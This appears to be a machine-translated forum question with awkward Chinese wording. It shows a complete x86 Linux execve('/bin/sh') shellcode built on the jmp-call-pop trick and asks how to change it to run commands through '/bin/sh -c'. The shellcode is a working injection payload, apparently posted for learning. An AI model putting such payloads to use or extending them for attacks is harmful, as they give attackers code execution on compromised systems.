添加参数的shellcode产卵壳

我有一些基本的shellcode：添加参数的shellcode产卵壳

BITS 32 

jmp short  callit   ; jmp trick as explained above 

doit: 

pop    esi    ; esi now represents the location of our string 
xor    eax, eax   ; make eax 0 
mov byte  [esi + 7], al  ; terminate /bin/sh 
lea    ebx, [esi]  ; get the adress of /bin/sh and put it in register ebx 
mov long  [esi + 8], ebx ; put the value of ebx (the address of /bin/sh) in AAAA ([esi +8]) 
mov long  [esi + 12], eax ; put NULL in BBBB (remember xor eax, eax) 
mov byte  al, 0x0b   ; Execution time! we use syscall 0x0b which represents execve 
mov    ebx, esi   ; argument one... ratatata /bin/sh 
lea    ecx, [esi + 8] ; argument two... ratatata our pointer to /bin/sh 
lea    edx, [esi + 12] ; argument three... ratataa our pointer to NULL 
int    0x80 

callit: 
call   doit    ; part of the jmp trick to get the location of db 

db    '/bin/sh#AAAABBBB' 

但可以说，我想添加一些命令作为外壳的论点。所以，例如，要创建一个新的文件，我会做一些像/ bin/sh -c'touch“filepath” 但我有点卡在我如何改变我的shellcode来做到这一点。

感谢， 西巴